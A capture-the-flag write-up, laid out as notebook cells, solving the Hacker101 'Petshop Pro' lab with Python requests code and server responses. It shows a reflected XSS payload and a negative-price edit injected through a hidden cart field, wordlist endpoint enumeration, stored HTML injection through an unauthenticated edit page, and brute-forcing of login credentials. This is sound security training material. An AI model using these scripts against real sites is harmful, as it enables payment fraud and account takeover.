# Petshop Pro - Captured flags 3/3

In [ ]:
import requests, json

url = "https://dac8fc97b84b1234f943a6bb88a88667.ctf.hacker101.com" # Home page

session = requests.Session()

## 1° Flag caught

In [ ]:
# Get the home page
response = session.get(url)
print(response.text)
print("Cookies:", session.cookies.get_dict())

Home page:
```html
<!doctype html>
<html>
	<head>
		<title>Petshop Pro &mdash; Home</title>
	</head>
	<body>
		<h1>Petshop Pro</h1>
		<p><a href="cart">0 items in cart</a></p>
		
		<table>
			<tr>
			
				<td><img src="static/kitten.jpg" width="300" height="168"></td>
			
				<td><img src="static/puppy.jpg" width="300" height="168"></td>
			
			</tr>
			<tr>
			
				<td><b>Kitten</b></td>
			
				<td><b>Puppy</b></td>
			
			</tr>
			<tr>
			
				<td>8"x10" color glossy photograph of a kitten.</td>
			
				<td>8"x10" color glossy photograph of a puppy.</td>
			
			</tr>
			<tr>
			
				<td>
					<a href="add/0">Add to Cart</a>
					
				</td>
			
				<td>
					<a href="add/1">Add to Cart</a>
					
				</td>
			
			</tr>
		</table>
	</body>
</html>
```

Cookies:
```python
Cookies: {'session': 'eyJjYXJ0IjpbXX0.aBXuKQ.YXOJouKrWZGxfbhsburqIE0lgJw'}
```

Let's go exploring the available endpoints.

In [ ]:
# Get the cart page
response = session.get(url + "/cart")
print(response.text)

# Add a new element to the cart and get the new cart page
response = session.get(url + "/add/0")
response = session.get(url + "/add/2")
response = session.get(url + "/add/1")

print(response.text)

Initial cart's page:
```html
<!doctype html>
<html>
	<head>
		<title>Petshop Pro &mdash; Cart</title>
	</head>
	<body>
		<h1>Shopping Cart</h1>
		<table>
			<tr>
				<th>Price</th>
				<th>Name</th>
				<th>Description</th>
			</tr>
			
		</table>
		<p><b>Total: $0</b></p>
		<form action="checkout" method="POST">
			<input type="hidden" name="cart" value="[]">
			<p><input type="submit" value="Check Out"></p>
		</form>
	</body>
</html>
<!doctype html>
```

Final cart's page:
```html
<html>
	<head>
		<title>Petshop Pro &mdash; Cart</title>
	</head>
	<body>
		<h1>Shopping Cart</h1>
		<table>
			<tr>
				<th>Price</th>
				<th>Name</th>
				<th>Description</th>
			</tr>
			
			<tr>
				<td>$8.95</td>
				<td>Kitten</td>
				<td>8"x10" color glossy photograph of a kitten.</td>
			</tr>
			
			<tr>
				<td>$7.95</td>
				<td>Puppy</td>
				<td>8"x10" color glossy photograph of a puppy.</td>
			</tr>
			
		</table>
		<p><b>Total: $16.9</b></p>
		<form action="checkout" method="POST">
			<input type="hidden" name="cart" value="[[0, {&#34;name&#34;: &#34;Kitten&#34;, &#34;desc&#34;: &#34;8\&#34;x10\&#34; color glossy photograph of a kitten.&#34;, &#34;logo&#34;: &#34;kitten.jpg&#34;, &#34;price&#34;: 8.95}], [1, {&#34;name&#34;: &#34;Puppy&#34;, &#34;desc&#34;: &#34;8\&#34;x10\&#34; color glossy photograph of a puppy.&#34;, &#34;logo&#34;: &#34;puppy.jpg&#34;, &#34;price&#34;: 7.95}]]">
			<p><input type="submit" value="Check Out"></p>
		</form>
	</body>
</html>
```

Firstly, I will try to exploit the value of the hidden tag in the form available in the cart's page.

In [ ]:
# Perform a checkout request

cart=[[1, {"name": "Puppy", "desc": "8\"x10\" color glossy photograph of a puppy.", "logo": "puppy.jpg", "price": 7.95}]]
response = session.post(url + "/checkout", data={"cart": json.dumps(cart)})
print(response.text)

Response:
```html
<!doctype html>
<html>
	<head>
		<title>Petshop Pro &mdash; Checkout</title>
	</head>
	<body>
		<h1>Checkout</h1>
		<ul>
		
			<li>$7.95 &mdash; <b>Puppy</b></li>
		
		</ul>
		
		<p><b>Total: $7.95</b></p>
		<i>Payments temporarily disabled</i>
	</body>
</html>
```

In [ ]:
# Perform a XSS-based checkout request

cart=[[1, {"name": "<script>alert(1);</script>", "desc": "8\"x10\" color glossy photograph of a puppy.", "logo": "puppy.jpg", "price": 7.95}]]
response = session.post(url + "/checkout", data={"cart": json.dumps(cart)})
print(response.text)

Response:
```html
<!doctype html>
<html>
	<head>
		<title>Petshop Pro &mdash; Checkout</title>
	</head>
	<body>
		<h1>Checkout</h1>
		<ul>
		
			<li>$7.95 &mdash; <b><script>alert(1);</script></b></li>
		
		</ul>
		
		<p><b>Total: $7.95</b></p>
		<i>Payments temporarily disabled</i>
	</body>
</html>
```

Reflected XSS worked, but no flag found :(\
Cookie is http-only so it is not possible to read it through Javascript code.

In [ ]:
# Perform a tampered checkout request

cart=[[0, {"name": "<script>alert(1);</script>", "desc": "8\"x10\" color glossy photograph of a puppy.", "logo": "puppy.jpg", "price": -1}]]
response = session.post(url + "/checkout", data={"cart": json.dumps(cart)})
print(response.text)

I tried to modify the price of the element in the cart with a strange numerical value. It worked!

Response:
```html
<!doctype html>
<html>
	<head>
		<title>Petshop Pro &mdash; Checkout</title>
	</head>
	<body>
		<h1>Checkout</h1>
		<ul>
		
			<li>$-1 &mdash; <b><script>alert(1);</script></b></li>
		
		</ul>
		^FLAG^...$FLAG$
		<p><b>Total: $-1</b></p>
		<i>Payments temporarily disabled</i>
	</body>
</html>
```

## 2° Flag caught

I try to exploit the /add/x API.

In [ ]:
response = session.get(url + "/add/ciao")
print(response.text)

response = session.get(url + "/add/384309304534")
print(response.text)

First response:
```html
<!doctype html>
<html lang=en>
<title>404 Not Found</title>
<h1>Not Found</h1>
<p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>
```

Second response:
```html
<!doctype html>
<html>
	<head>
		<title>Petshop Pro &mdash; Cart</title>
	</head>
	<body>
		<h1>Shopping Cart</h1>
		<table>
			<tr>
				<th>Price</th>
				<th>Name</th>
				<th>Description</th>
			</tr>
			
		</table>
		<p><b>Total: $0</b></p>
		<form action="checkout" method="POST">
			<input type="hidden" name="cart" value="[]">
			<p><input type="submit" value="Check Out"></p>
		</form>
	</body>
</html>
```

It seems that the /add API accepts only numerical values, even if no item is associated to that id.

In [ ]:
# I want to try to call other methods on the /add API endpoint

for i in ['', 0, 'asdadx', 12323131]:
	response = session.post(url + f"/add/{i}")
	print(response.text)

	response = session.put(url + f"/add/{i}")
	print(response.text)

	response = session.delete(url + f"/add/{i}")
	print(response.text)

	response = session.patch(url + f"/add/{i}")
	print(response.text)

Responses:
```html
<!doctype html>
<html lang=en>
<title>404 Not Found</title>
<h1>Not Found</h1>
<p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>

<!doctype html>
<html lang=en>
<title>404 Not Found</title>
<h1>Not Found</h1>
<p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>

<!doctype html>
<html lang=en>
<title>404 Not Found</title>
<h1>Not Found</h1>
<p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>

<!doctype html>
<html lang=en>
<title>404 Not Found</title>
<h1>Not Found</h1>
<p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>

<!doctype html>
<html lang=en>
<title>405 Method Not Allowed</title>
<h1>Method Not Allowed</h1>
<p>The method is not allowed for the requested URL.</p>

<!doctype html>
<html lang=en>
<title>405 Method Not Allowed</title>
<h1>Method Not Allowed</h1>
<p>The method is not allowed for the requested URL.</p>

<!doctype html>
<html lang=en>
<title>405 Method Not Allowed</title>
<h1>Method Not Allowed</h1>
<p>The method is not allowed for the requested URL.</p>

<!doctype html>
<html lang=en>
<title>405 Method Not Allowed</title>
<h1>Method Not Allowed</h1>
<p>The method is not allowed for the requested URL.</p>

<!doctype html>
<html lang=en>
<title>404 Not Found</title>
<h1>Not Found</h1>
<p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>

<!doctype html>
<html lang=en>
<title>404 Not Found</title>
<h1>Not Found</h1>
<p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>

<!doctype html>
<html lang=en>
<title>404 Not Found</title>
<h1>Not Found</h1>
<p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>

<!doctype html>
<html lang=en>
<title>404 Not Found</title>
<h1>Not Found</h1>
<p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>

<!doctype html>
<html lang=en>
<title>405 Method Not Allowed</title>
<h1>Method Not Allowed</h1>
<p>The method is not allowed for the requested URL.</p>

<!doctype html>
<html lang=en>
<title>405 Method Not Allowed</title>
<h1>Method Not Allowed</h1>
<p>The method is not allowed for the requested URL.</p>

<!doctype html>
<html lang=en>
<title>405 Method Not Allowed</title>
<h1>Method Not Allowed</h1>
<p>The method is not allowed for the requested URL.</p>

<!doctype html>
<html lang=en>
<title>405 Method Not Allowed</title>
<h1>Method Not Allowed</h1>
<p>The method is not allowed for the requested URL.</p>
```

In [ ]:
# I want to try to call other methods on the /cart API endpoint

for i in ['']:
	response = session.post(url + f"/cart")
	print(response.text)

	response = session.put(url + f"/cart")
	print(response.text)

	response = session.delete(url + f"/cart")
	print(response.text)

	response = session.patch(url + f"/cart")
	print(response.text)

Responses:
```html
<!doctype html>
<html lang=en>
<title>405 Method Not Allowed</title>
<h1>Method Not Allowed</h1>
<p>The method is not allowed for the requested URL.</p>

<!doctype html>
<html lang=en>
<title>405 Method Not Allowed</title>
<h1>Method Not Allowed</h1>
<p>The method is not allowed for the requested URL.</p>

<!doctype html>
<html lang=en>
<title>405 Method Not Allowed</title>
<h1>Method Not Allowed</h1>
<p>The method is not allowed for the requested URL.</p>

<!doctype html>
<html lang=en>
<title>405 Method Not Allowed</title>
<h1>Method Not Allowed</h1>
<p>The method is not allowed for the requested URL.</p>
```

I want to try to enumerate the available endpoints

In [ ]:
import time
with open("common_endpoints.txt", "r") as f:
	common_endpoints = f.read().splitlines()

i = 0
resume = False
for endpoint in common_endpoints:
	if i % 100 == 0:
		print(f"Testing endpoint {i}/{len(common_endpoints)}: {endpoint}")

	i += 1

	if endpoint == "txt":
		resume = True
		continue
	elif not resume:
		continue

	a = session.get(url + f"/{endpoint}")
	b = session.post(url + f"/{endpoint}")

	if any([a.status_code != 404, b.status_code != 404]):
		print(f"Endpoint {endpoint} is reachable")
		print(f"GET: {a.status_code}, POST: {b.status_code}")
	
	time.sleep(0.1) # To avoid overwhelming the server

Discovered endpoints: edit, login

In [ ]:
import time
with open("common_usernames.txt", "r") as f:
	common_usernames = f.read().splitlines()

i = 0
for u in common_usernames:
	if i % 100 == 0:
		print(f"Testing username {i}/{len(common_usernames)}: {u}")

	response = requests.post(url + "/login", data={"username": u, "password": "password"})

	if response.status_code == 200:
		if "Invalid username" not in response.text:	
			print(f"Username {u} is valid")
			print(response.text)
	else:
		print(f"strange response for username {u}: {response.status_code}")
		print(response.text)
	
	time.sleep(0.1) # To avoid overwhelming the server
	
	i += 1

No username found. Let's look at the edit API

In [ ]:
response = session.get(url + "/edit?id=1")
print(response.text)

Response:
```html
<!doctype html>
<html>
	<head>
		<title>Petshop Pro &mdash; Edit Product</title>
	</head>
	<body>
		<h1>Edit Product</h1>
		<form method="POST">
			<p><img src="static/puppy.jpg"></p>
			<p>Name: <input type="text" name="name" value="Puppy"></p>
			<p>Description: <input type="text" name="desc" value="8&#34;x10&#34; color glossy photograph of a puppy."></p>
			<p>Price: <input type="text" name="price" value="7.95"></p>
			<input type="hidden" name="id" value="1">
			<p><input type="submit" value="Save"></p>
		</form>
	</body>
</html>
```

In [ ]:
# Try to edit the item with id 1 with a new id
response = session.post(url + "/edit?id=1", data={"name": "Puppyz", "desc": "8\"x10\" color glossy photograph of a puppy.", "price": "7.95", "id": "1"})
print(response.text)


The new name of the item is:
```html
<!doctype html>
<html>
	<head>
		<title>Petshop Pro &mdash; Edit Product</title>
	</head>
	<body>
		<h1>Edit Product</h1>
		<form method="POST">
			<p><img src="static/puppy.jpg"></p>
			<p>Name: <input type="text" name="name" value="Puppyz"></p>
			<p>Description: <input type="text" name="desc" value="8&#34;x10&#34; color glossy photograph of a puppy."></p>
			<p>Price: <input type="text" name="price" value="7.95"></p>
			<input type="hidden" name="id" value="1">
			<p><input type="submit" value="Save"></p>
		</form>
	</body>
</html>
```

Now, I want to make a more dangerous exploit...

In [ ]:
# Try to edit the item with id 1 to fool the user to add new items to the cart
response = session.post(url + "/edit?id=1", data={"name": '<a href="add/1">premi</a>', "desc": '<a href="add/1">premi</a>', "price": 7.95, "id": 1})

# Add a new item to the cart with the id of the item we just edited
response = session.get(url + "/add/1")

# Look at the cart page to see if the item was added
response = session.get(url + "/cart")
print(response.text)

Response:
```html
<!doctype html>
<html>
	<head>
		<title>Petshop Pro &mdash; Cart</title>
	</head>
	<body>
		<h1>Shopping Cart</h1>
		<table>
			<tr>
				<th>Price</th>
				<th>Name</th>
				<th>Description</th>
			</tr>
			
			<tr>
				<td>$7.95</td>
				<td><a href="add/1">premi</a> &mdash; ^FLAG^...$FLAG$</td>
				<td><a href="add/1">premi</a></td>
			</tr>
			
		</table>
		<p><b>Total: $15.9</b></p>
		<form action="checkout" method="POST">
			<input type="hidden" name="cart" value="[[1, {&#34;name&#34;: &#34;&lt;a href=\&#34;add/1\&#34;&gt;premi&lt;/a&gt;&#34;, &#34;desc&#34;: &#34;&lt;a href=\&#34;add/1\&#34;&gt;premi&lt;/a&gt;&#34;, &#34;logo&#34;: &#34;puppy.jpg&#34;, &#34;price&#34;: 7.95}], [1, {&#34;name&#34;: &#34;&lt;a href=\&#34;add/1\&#34;&gt;premi&lt;/a&gt;&#34;, &#34;desc&#34;: &#34;&lt;a href=\&#34;add/1\&#34;&gt;premi&lt;/a&gt;&#34;, &#34;logo&#34;: &#34;puppy.jpg&#34;, &#34;price&#34;: 7.95}]]">
			<p><input type="submit" value="Check Out"></p>
		</form>
	</body>
</html>
```

Boom! I found the second flag!

## 3° Flag caught

I want to bruteforce username and password for the /login API

In [ ]:
import time
with open("common_usernames.txt", "r") as f:
	common_usernames = f.read().splitlines()

i = 0
found_username = None
for u in common_usernames:
	if i % 100 == 0:
		print(f"Testing username {i}/{len(common_usernames)}: {u}")

	response = requests.post(url + "/login", data={"username": u, "password": "password"})

	if response.status_code == 200:
		if "Invalid username" not in response.text:	
			print(f"Username {u} is valid")
			print(response.text)
			found_username = u
			break
	else:
		print(f"strange response for username {u}: {response.status_code}")
		print(response.text)
	
	time.sleep(0.1) # To avoid overwhelming the server
	
	i += 1

with open("common_passwords.txt", "r") as f:
	common_passwords = f.read().splitlines()

found_password = None
i = 0

for p in common_passwords:
	if i % 100 == 0:
		print(f"Testing password {i}/{len(common_passwords)}: {p}")

	response = requests.post(url + "/login", data={"username": found_username, "password": p})

	if response.status_code == 200:
		if "Invalid password" not in response.text:	
			print(f"Password {p} is valid")
			print(response.text)
			found_password = p
			break
	else:
		print(f"strange response for password {p}: {response.status_code}")
		print(response.text)
	
	time.sleep(0.1) # To avoid overwhelming the server
	
	i += 1

print(f"Found username: {found_username}")
print(f"Found password: {found_password}")

carmel is a valid username, kristy a valid password

In [ ]:
response = session.post(url + "/login", data={"username": found_username, "password": found_password})
print(response.text)

Response:
```html
<!doctype html>
<html>
	<head>
		<title>Petshop Pro &mdash; Home</title>
	</head>
	<body>
		<h1>Petshop Pro</h1>
		<p><a href="cart">0 items in cart</a></p>
		<p><b>^FLAG^...$FLAG$</b></p>
		<table>
			<tr>
			
				<td><img src="static/kitten.jpg" width="300" height="168"></td>
			
				<td><img src="static/puppy.jpg" width="300" height="168"></td>
			
			</tr>
			<tr>
			
				<td><b>Kitten</b></td>
			
				<td><b>Puppy</b></td>
			
			</tr>
			<tr>
			
				<td>8"x10" color glossy photograph of a kitten.</td>
			
				<td>8"x10" color glossy photograph of a puppy.</td>
			
			</tr>
			<tr>
			
				<td>
					<a href="add/0">Add to Cart</a>
					
						&mdash; <a href="edit?id=0" style="color: red">Edit</a>
					
				</td>
			
				<td>
					<a href="add/1">Add to Cart</a>
					
						&mdash; <a href="edit?id=1" style="color: red">Edit</a>
					
				</td>
			
			</tr>
		</table>
	</body>
</html>
```

Third flag found!